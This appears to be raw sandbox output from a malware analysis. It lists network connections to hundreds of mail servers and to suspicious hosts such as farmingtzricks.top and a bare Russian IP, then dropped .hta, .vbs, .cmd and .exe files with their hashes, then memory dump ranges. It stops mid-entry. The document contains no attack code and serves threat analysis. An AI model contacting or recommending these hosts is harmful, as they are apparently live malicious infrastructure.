GB 216.58.213.14:443 consent.youtube.com tcp
N/A 127.0.0.1:49687 tcp
N/A 127.0.0.1:49695 tcp
US 52.223.34.187:587 docomo.ne.jp tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 52.70.40.64:2525 mail2.wizard101.com tcp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
GB 216.58.213.14:443 consent.youtube.com udp
US 143.95.144.49:2525 _dc-mx.159e58ed5f8f.progressivedm.com tcp
US 8.8.8.8:53 cameo.plala.or.jp udp
US 8.8.8.8:53 i.ua udp
NL 142.250.102.27:25 aspmx.l.google.com tcp
JP 60.36.166.190:587 cameo.plala.or.jp tcp
US 104.18.3.81:587 i.ua tcp
US 8.8.8.8:53 ezweb.ne.jp udp
JP 222.15.69.195:587 ezweb.ne.jp tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 email.cz udp
US 8.8.8.8:53 viajeseci-es.mail.protection.outlook.com udp
US 96.102.167.165:587 smtp.comcast.net tcp
US 8.8.8.8:53 void.blackhole.mx udp
US 8.8.8.8:53 softbank.ne.jp udp
US 8.8.8.8:53 mxa-0027ec02.gslb.pphosted.com udp
US 8.8.8.8:53 smtp.joogle.gr udp
US 8.8.8.8:53 mx.luisaderbez.com.cust.a.hostedemail.com udp
US 8.8.8.8:53 out.ftg.couk udp
US 8.8.8.8:53 agpglass-com.mail.protection.outlook.com udp
US 8.8.8.8:53 in.com udp
US 8.8.8.8:53 smtp.r.case.fr udp
US 8.8.8.8:53 rogers.com udp
US 8.8.8.8:53 out.fuckcuf.com udp
US 8.8.8.8:53 smtp.skyplala.or.jp udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
IN 124.153.64.203:587 in.com tcp
DE 78.47.159.103:465 void.blackhole.mx tcp
US 75.2.126.67:2525 smtp.r.case.fr tcp
US 52.101.10.2:587 agpglass-com.mail.protection.outlook.com tcp
NL 52.101.73.1:25 viajeseci-es.mail.protection.outlook.com tcp
IT 213.209.1.146:587 smtp.iol.it tcp
CZ 77.75.78.196:587 email.cz tcp
CA 40.85.218.2:587 rogers.com tcp
CA 216.40.42.4:465 mx.luisaderbez.com.cust.a.hostedemail.com tcp
US 8.8.8.8:53 thenewhouses-co-uk.mail.protection.outlook.com udp
US 8.8.8.8:53 alunomicrolins-com-br.mail.protection.outlook.com udp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 sonet-common-mx-v4.xspmail.jp udp
US 8.8.8.8:53 usit-ie.mail.protection.outlook.com udp
US 104.26.12.69:587 centrum.sk tcp
US 8.8.8.8:53 mxb-0036ba01.gslb.pphosted.com udp
US 96.102.167.165:587 smtp.comcast.net tcp
US 104.18.3.81:587 i.ua tcp
US 8.8.8.8:53 smtp.kabelbw.de udp
US 8.8.8.8:53 online.de udp
US 8.8.8.8:53 mail10.tolna.net udp
NL 142.250.102.27:2525 aspmx.l.google.com tcp
US 8.8.8.8:53 cdtm.de udp
US 8.8.8.8:53 mj.scn-net.ne.jp udp
US 8.8.8.8:53 provider3000-com.mail.protection.outlook.com udp
DE 185.132.180.104:2525 mxa-0027ec02.gslb.pphosted.com tcp
JP 160.13.60.174:25 sonet-common-mx-v4.xspmail.jp tcp
DE 212.227.0.72:587 online.de tcp
JP 175.177.0.252:465 mj.scn-net.ne.jp tcp
GB 52.101.89.0:465 usit-ie.mail.protection.outlook.com tcp
GB 52.101.89.2:2525 usit-ie.mail.protection.outlook.com tcp
BR 52.101.198.0:465 alunomicrolins-com-br.mail.protection.outlook.com tcp
NL 52.101.73.8:2525 provider3000-com.mail.protection.outlook.com tcp
DE 138.246.224.218:587 cdtm.de tcp
HU 91.146.167.10:587 mail10.tolna.net tcp
DE 151.189.176.206:587 smtp.kabelbw.de tcp
US 8.8.8.8:53 zandarin.it udp
NL 142.250.102.27:465 aspmx.l.google.com tcp
US 8.8.8.8:53 out.ncmc.com udp
US 8.8.8.8:53 knology.net udp
US 8.8.8.8:53 zeus.eonet.ne.jp udp
US 8.8.8.8:53 iitk.ac.in udp
US 8.8.8.8:53 gmbol.cem udp
NL 142.250.102.27:25 aspmx.l.google.com tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
NL 185.183.28.135:465 mxb-0036ba01.gslb.pphosted.com tcp
IN 202.3.77.184:465 iitk.ac.in tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
IT 80.88.87.69:25 zandarin.it tcp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 bbox.fr udp
US 8.8.8.8:53 out.ikyung.fr udp
US 8.8.8.8:53 deped-gov-ph.mail.protection.outlook.com udp
US 8.8.8.8:53 abelia.ocn.ne.jp udp
US 8.8.8.8:53 adam.com.au udp
US 8.8.8.8:53 smtp.sportlabgroup.com udp
US 64.29.151.81:587 knology.net tcp
AU 203.0.178.48:587 adam.com.au tcp
SG 52.101.137.2:587 deped-gov-ph.mail.protection.outlook.com tcp
US 76.223.54.146:2525 smtp.sportlabgroup.com tcp
JP 222.15.69.195:587 ezweb.ne.jp tcp
US 8.8.8.8:53 mx203.inbound-mx.net udp
US 8.8.8.8:53 mx01.ionos.de udp
US 8.8.8.8:53 smtp.buckys.net udp
DE 212.227.0.72:587 online.de tcp
NL 142.250.102.27:25 aspmx.l.google.com tcp
US 8.8.8.8:53 gmqil-com.mail.protection.outlook.com udp
US 147.182.130.78:587 mx203.inbound-mx.net tcp
DE 217.72.192.67:2525 mx01.ionos.de tcp
CA 52.101.190.0:25 gmqil-com.mail.protection.outlook.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
JP 180.37.194.20:587 abelia.ocn.ne.jp tcp
US 8.8.8.8:53 www.google.com udp
DE 151.189.176.206:587 smtp.kabelbw.de tcp
US 8.8.8.8:53 smtp.ig.com.br udp
US 8.8.8.8:53 edmondschools.net udp
US 8.8.8.8:53 bury.nhs.uk udp
US 8.8.8.8:53 smtp.emporiolingerie.com udp
US 8.8.8.8:53 onebox.jp udp
US 8.8.8.8:53 out.b.astral.ro udp
US 8.8.8.8:53 smtp.cg74.fr udp
US 8.8.8.8:53 out.klikni.cz udp
US 8.8.8.8:53 kinatex-com.mail.protection.outlook.com udp
US 8.8.8.8:53 smtp.krone-jp.com udp
BR 168.0.132.203:587 smtp.ig.com.br tcp
CA 52.101.192.0:2525 kinatex-com.mail.protection.outlook.com tcp
US 34.238.178.141:25 edmondschools.net tcp
FR 46.18.193.125:2525 smtp.cg74.fr tcp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 dupidu.de udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 random.com udp
US 52.223.34.187:587 docomo.ne.jp tcp
US 96.102.167.165:587 smtp.comcast.net tcp
DE 167.99.248.199:587 citromail.hu tcp
US 8.8.8.8:53 mx.teremopt.ru udp
US 8.8.8.8:53 smtp.swissonline.ch udp
US 8.8.8.8:53 smtp.politicheagricole.gov.it udp
US 8.8.8.8:53 smtp.jessy.com udp
US 8.8.8.8:53 tianya.cn udp
US 8.8.8.8:53 smtp.malden.mec.edu udp
IT 213.209.1.145:587 smtp.virgilio.it tcp
US 8.8.8.8:53 out.hotnail.co udp
US 8.8.8.8:53 myspace.com udp
US 8.8.8.8:53 smtp.lejardindelareine.fr udp
US 8.8.8.8:53 smtp.chmail.ir udp
DE 167.99.248.199:587 citromail.hu tcp
US 8.8.8.8:53 mx2.mail.bg udp
US 8.8.8.8:53 securesmtp.cnc.bbiq.jp udp
US 8.8.8.8:53 publicaddress-fr01e.mail.protection.outlook.com udp
US 8.8.8.8:53 mail.vodafone.es udp
US 8.8.8.8:53 ya.ua udp
US 18.191.48.14:465 random.com tcp
BG 193.201.172.118:25 mx2.mail.bg tcp
US 34.111.176.156:587 myspace.com tcp
FR 52.101.166.0:25 publicaddress-fr01e.mail.protection.outlook.com tcp
US 13.248.169.48:25 smtp.jessy.com tcp
FR 92.204.41.31:587 ya.ua tcp
NL 94.169.2.19:587 smtp.swissonline.ch tcp
RU 62.213.82.98:2525 mx.teremopt.ru tcp
US 8.8.8.8:53 front.ru udp
US 8.8.8.8:53 zeelandnet.nl udp
US 8.8.8.8:53 mx1.zenbox.pl udp
US 8.8.8.8:53 fortimail.lkdsb.net udp
US 8.8.8.8:53 nexyzbb.ne.jp udp
US 8.8.8.8:53 versanet.de udp
US 8.8.8.8:53 indiatimes.com udp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 out.pdesktop.fr udp
IR 80.191.56.151:587 smtp.chmail.ir tcp
DE 212.7.147.128:587 versanet.de tcp
US 104.18.4.31:587 zeelandnet.nl tcp
GB 23.204.235.69:587 indiatimes.com tcp
PL 46.245.193.99:25 mx1.zenbox.pl tcp
US 8.8.8.8:53 alt1.aspmx.l.google.com udp
US 8.8.8.8:53 kci.co.kr udp
US 8.8.8.8:53 vfc-com.mail.protection.outlook.com udp
NL 142.250.102.27:2525 aspmx.l.google.com tcp
US 8.8.8.8:53 SMTP.GOOGLE.COM udp
US 8.8.8.8:53 khaki.plala.or.jp udp
US 8.8.8.8:53 out.qq.cn udp
CA 72.38.227.166:465 fortimail.lkdsb.net tcp
JP 60.36.166.222:587 khaki.plala.or.jp tcp
DE 142.251.9.27:587 alt1.aspmx.l.google.com tcp
NL 142.250.102.26:587 SMTP.GOOGLE.COM tcp
US 52.101.40.0:25 vfc-com.mail.protection.outlook.com tcp
US 8.8.8.8:53 pop3.galatasaray.com udp
DE 81.169.145.164:587 dupidu.de tcp
KR 121.156.248.207:2525 kci.co.kr tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 213.209.150.137:4117 towerbingobongoboom.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrn76.gvt1.com udp
GB 173.194.137.73:443 r4---sn-aigzrn76.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrn76.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrn76.gvt1.com udp
GB 173.194.137.73:443 r4.sn-aigzrn76.gvt1.com udp
US 213.209.150.137:4117 towerbingobongoboom.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
GB 142.250.200.14:443 play.google.com udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 5.75.210.149:443 tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 smtp.reanuncie.com.br udp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 104.21.24.225:443 farmingtzricks.top tcp
US 8.8.8.8:53 out.compaq.com udp
US 8.8.8.8:53 mx.studiomastrandrea.it udp
NL 142.250.102.27:2525 SMTP.GOOGLE.COM tcp
US 8.8.8.8:53 mx.noveraenergy.com udp
US 8.8.8.8:53 smtp.ogrenci.ibu.tr udp
US 8.8.8.8:53 smtp.biomex.cl udp
IT 62.149.128.166:465 mx.studiomastrandrea.it tcp
US 66.96.140.137:2525 mx.noveraenergy.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\EDNDI4qKk.hta

MD5 5ff46727acadec494bc3947481919d7a
SHA1 ae242a67acba5e4dd23e9b35aa143288805db7a8
SHA256 60983400f01860e5d810b5bb238cbbf5fed605a35cb6cec0f4cf09b1b34bd216
SHA512 466e32a957c25f9b6a92ecab9cb7d35f0f6e630606098d956216ae026012ee33690f08ce9e33c2e8acb7406507003f7219a6a0842c1928c17e549f9d4c047699

\Users\Admin\AppData\Local\TempKKPQ9REKQ59CO3PKOOAPGR8TAPBIRKGZ.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/3044-13-0x0000000006480000-0x0000000006942000-memory.dmp

memory/2796-15-0x0000000000D20000-0x00000000011E2000-memory.dmp

memory/3044-12-0x0000000006480000-0x0000000006942000-memory.dmp

memory/2796-29-0x0000000007290000-0x0000000007752000-memory.dmp

memory/2644-32-0x00000000003F0000-0x00000000008B2000-memory.dmp

memory/2796-31-0x0000000000D20000-0x00000000011E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 a9749ee52eefb0fd48a66527095354bb
SHA1 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256 b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
SHA512 9d21f0e1e376b89df717403a3939ed86ef61095bb9f0167ff15c01d3bbbee03d4dd01b3e2769ecd921e40e43bab3cbf0a6844ab6f296982227b0cb507b4b0e25

memory/2644-58-0x00000000003F0000-0x00000000008B2000-memory.dmp

memory/2644-57-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108450101\BUZd3Mq.exe

MD5 ff130f0907781b9b0564a2e34350bda9
SHA1 968fd9f8787bda595df9a1670d28e8b129bbea99
SHA256 820ab89ef3e39e2ec7f7322c4710a7fbb1cc01b5cc28043f607f30312119a1b5
SHA512 8e5feb41fcfdf2366c8da4fda8d37eb29defb839689cacfdaf50d03604447e18e9cf83f31d90f7f48fce0ad40add335cf85b0c3b135de396e5971c19fd239e1f

C:\Users\Admin\AppData\Local\Temp\Lappy.A.vbs

MD5 3811496e1794473ea967dcd32594ccbb
SHA1 80d98553d718103ce5d52cacd64367d71ba4edd5
SHA256 477a23adf9b2e3b1b595dde107ee8f1a409671491e74b21e5ffdb0062525fc0d
SHA512 9cefbd14f7a3343c164397972d177c32b7ca5f72127c34481d02068ef4c78825cf40208b8e6869535726cdf6852b55b9d89d6850bf42af50c746de494a1185c3

\Users\Admin\AppData\Local\Temp\Build.exe

MD5 a94e37aebedaf87a3763e1c7766b5940
SHA1 d9064a5ec1ea7957cdde14a26e8b58ec9981fb0a
SHA256 7ee9298b5c6f9e90309c31684e030960cac17d71ca1316a2493843ef35d2cd70
SHA512 a82cf09a3048278b7439aedd6b2a9c5c4b528d42b5650881c88b39bc3cd4d40f995dbec2d8a2b8e1f4fc8e0e041b27f932b36fd67a4da268e5dd9f479517c948

memory/1964-86-0x0000000000F90000-0x0000000001024000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2552-106-0x0000000004460000-0x00000000048A0000-memory.dmp

memory/2584-108-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2552-105-0x0000000004460000-0x00000000048A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108470101\5f791593f2.exe

MD5 07164c5597a4fbd5cf8c5ebcc43fcbd3
SHA1 d8ffc868f9a36ab2323440bc0a263e2e3e52def3
SHA256 2ea53f7442f44cfc2ea88f2b52d6841ec009d4789f67fd002530e4dece4235d3
SHA512 87d4f793aee02e5e484588913034caddfab25381a959815c57d0ec2979539c641a25cabe43c917659cc912d851c5d7d7dc64f02a01e541b554b3eedc8e0477d9

C:\Users\Admin\AppData\Local\Temp\qzB3DS6ZF.hta

MD5 104f8ef71bc924cac51607748ebcfadd
SHA1 c6158b43131051be4bfb8b2ae0f554cbb6ab3512
SHA256 7f47022000a05411b242a9794d6f9e23b120a28e95e19ce8fb54522f08fe5b07
SHA512 1729233346d50821555c71bda6b04c30b200fb99d629b0cd60af602e074651d59351005cd19108412602157575e44988561ad2d005f0270704b46b7c498560aa

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 63c6ca71e90773389d619bc9c5e74088
SHA1 0262b5d91c901b656c68a093ccbb6c906a76b9bb
SHA256 97cdf3c9c1671ae516bb12ad5e59df7fad22ffe112b0abfff8ec0a75bcb21145
SHA512 a62d0ce612b657807cda03337e2e583b87b6405ffba9d22408ad9b1ff2c278e11584cfbb1b3b2e5f23d3794fd7ff79ce943acf191e12bf5582f9c04accc292ff

memory/2644-133-0x00000000003F0000-0x00000000008B2000-memory.dmp

\Users\Admin\AppData\Local\TempEZ54RVN0BRBSYKQEUJMKPJ7U62CGNUVD.EXE

MD5 1565063ca3d43812789fbf960418659e
SHA1 d710ecdf1861e25498d1886f8c2a44f31826fd55
SHA256 c5b7480a6d02c38a408981322c52ad0d6efbdc0a0d6508d788d3575c561cc978
SHA512 eb044ea8ecdfed744685623fd3bf16dc0221900b405eff580d93de62073e31b93b23b69e81fea1a2bff6deac793cee038587d127fb3ddcca1359f3380f7cca42

memory/2128-142-0x0000000006470000-0x000000000692C000-memory.dmp

memory/828-147-0x0000000000E80000-0x000000000133C000-memory.dmp

memory/2128-145-0x0000000006470000-0x000000000692C000-memory.dmp

memory/2552-144-0x0000000004460000-0x00000000048A0000-memory.dmp

memory/2552-143-0x0000000004460000-0x00000000048A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd

MD5 cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1 b0db8b540841091f32a91fd8b7abcd81d9632802
SHA256 5e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512 ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5

memory/2584-163-0x0000000000400000-0x0000000000840000-memory.dmp

memory/828-165-0x0000000000E80000-0x000000000133C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 8c510278c12ae8407e04a6120930b877
SHA1 443940cc720b705ae6eb5785b6313f1f14892aa6
SHA256 14ad6963cb9f2804455f09574e21c6af420d013c3dff9c6cf108d4f0a3cb78f7
SHA512 a4ab6db0170fda8c42ff2e58a8c4b6ef40293509d5afe8bb0fd1333a3663089749d091649796c7cae33f8b473067798242be795f208eb59d9db78f1fa6aa40e5

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2584-178-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Temp\VXKOLlpHx.hta

MD5 39c8cd50176057af3728802964f92d49
SHA1 68fc10a10997d7ad00142fc0de393fe3500c8017
SHA256 f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512 cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

memory/1032-193-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 a153721c730a60c7e46bfa4ebdc3bb3b
SHA1 0db4bbff30156808705c2fb05bad507320a5f3dd
SHA256 1e43d702bd93d1f11b2295b0edbdd6cb09a4316e2ec10567d4f8944686df0de9
SHA512 d0f434e61ed0229da185f29b477a904b7a6ae91ffd477be9522bd1a32b97c2db20666bd7fdb1d1ea97c42d90296d2d9652c20e1899974f2223cd09a6a01c6c30

C:\Users\Admin\AppData\Local\Temp\10108680101\2asf3YX.exe

MD5 19d2fe8a5d6c2174fb2a5c54e98523e0
SHA1 8e0a2cf8cbff8c169cba1e0a3785083ebeb5a627
SHA256 8a12b05f92dbb47d713dbc73cccccb089fc88f6ba96b5a64f42aaf6431e5616e
SHA512 3ff858f79a4e55f6728369b0f0d6de6060dbc4728ab21e5c352c209ef92b203f3039a623118706227ac61f75ab8b68ae4958d7939a000729de0890b54706ca95

memory/2064-207-0x0000000000180000-0x0000000000204000-memory.dmp

memory/2644-208-0x00000000003F0000-0x00000000008B2000-memory.dmp

memory/2584-209-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1032-210-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1032-211-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2592-221-0x0000000006670000-0x0000000006B2C000-memory.dmp

memory/2592-220-0x0000000006670000-0x0000000006B2C000-memory.dmp

memory/988-223-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/988-224-0x0000000000E60000-0x000000000131C000-memory.dmp

memory/2644-225-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108710101\17f337a055.exe

MD5 aa512b143958cbbe85c4fb41bb9ba3fa
SHA1 46459666d53ecb974385698aa8c306e49c1110ab
SHA256 8852cc3effc2d3698b05859fa1a18a758b26712263d38ea2de7ef138a31c2b26
SHA512 9ab9dbf0d0f7861bf18738d59f03b20f0552461857d4ff3f68d25cc4621f85aaab94050217a1a0c6d3c5a0adb09411a21a6541dcd1042b2a95413c65b2ec0333

memory/2644-241-0x0000000006CB0000-0x000000000769D000-memory.dmp

memory/2644-240-0x0000000006CB0000-0x000000000769D000-memory.dmp

memory/2584-243-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108720101\c9a9737454.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/1312-257-0x0000000000EB0000-0x0000000000F28000-memory.dmp

memory/904-271-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-263-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-270-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-267-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-265-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-261-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-259-0x0000000000400000-0x0000000000465000-memory.dmp

memory/904-269-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1032-272-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2644-273-0x00000000003F0000-0x00000000008B2000-memory.dmp

memory/2644-274-0x0000000006CB0000-0x000000000769D000-memory.dmp

memory/2364-275-0x00000000008F0000-0x00000000012DD000-memory.dmp

memory/1448-276-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1448-278-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2364-277-0x00000000008F0000-0x00000000012DD000-memory.dmp

memory/2584-279-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1448-283-0x0000000010000000-0x000000001001C000-memory.dmp

memory/1032-286-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2644-289-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108730101\001fe21595.exe

MD5 d53656310722785044f0636900d64d0a
SHA1 da222b11525b44cb92fb82bcb05ba10cf64ed26d
SHA256 81f9c75efa3bef3119a2eacb028d7b85b8df8311e4eec39ed49733a7dfc604a8
SHA512 0abf5aedd9553e755f5ca9e6104ad769ea607d2ffad5d2a09355668d1de37b59367c82fd712ed5ad4763362ff3a008eb161d94f53d16ed93526557e679896697

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5GWW47WY\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

memory/2584-304-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1032-306-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2644-309-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108740101\cafe79aeae.exe

MD5 5af71429b3b21c4ecb55d948a04f92a0
SHA1 6087f72c97eda7239f4e0631d07d64bfdb7c6ca0
SHA256 b1c0c3f611c1ee99465613f3045b154c43e1e0f94c1171c55b8c5ff2c4a9285b
SHA512 a27b3cef97bf2d58499df7ae1efafa34684f95b1b76e13c654ba9089ce3869e340e08daa12d83a1b1e2a891cd1a459d44b7a9b33e7593b9bcbb86efc9f17d827

memory/680-325-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1108-324-0x0000000000C80000-0x00000000018D0000-memory.dmp

memory/2584-329-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2584-335-0x0000000000400000-0x0000000000840000-memory.dmp

memory/1032-344-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\TarC04A.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2644-405-0x00000000003F0000-0x00000000008B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10108750101\0d8c3b8c27.exe

MD5 30305d29528f3aca3b09636d919bd512
SHA1 4af875a29e249da70f2da3519334af8fd584c193
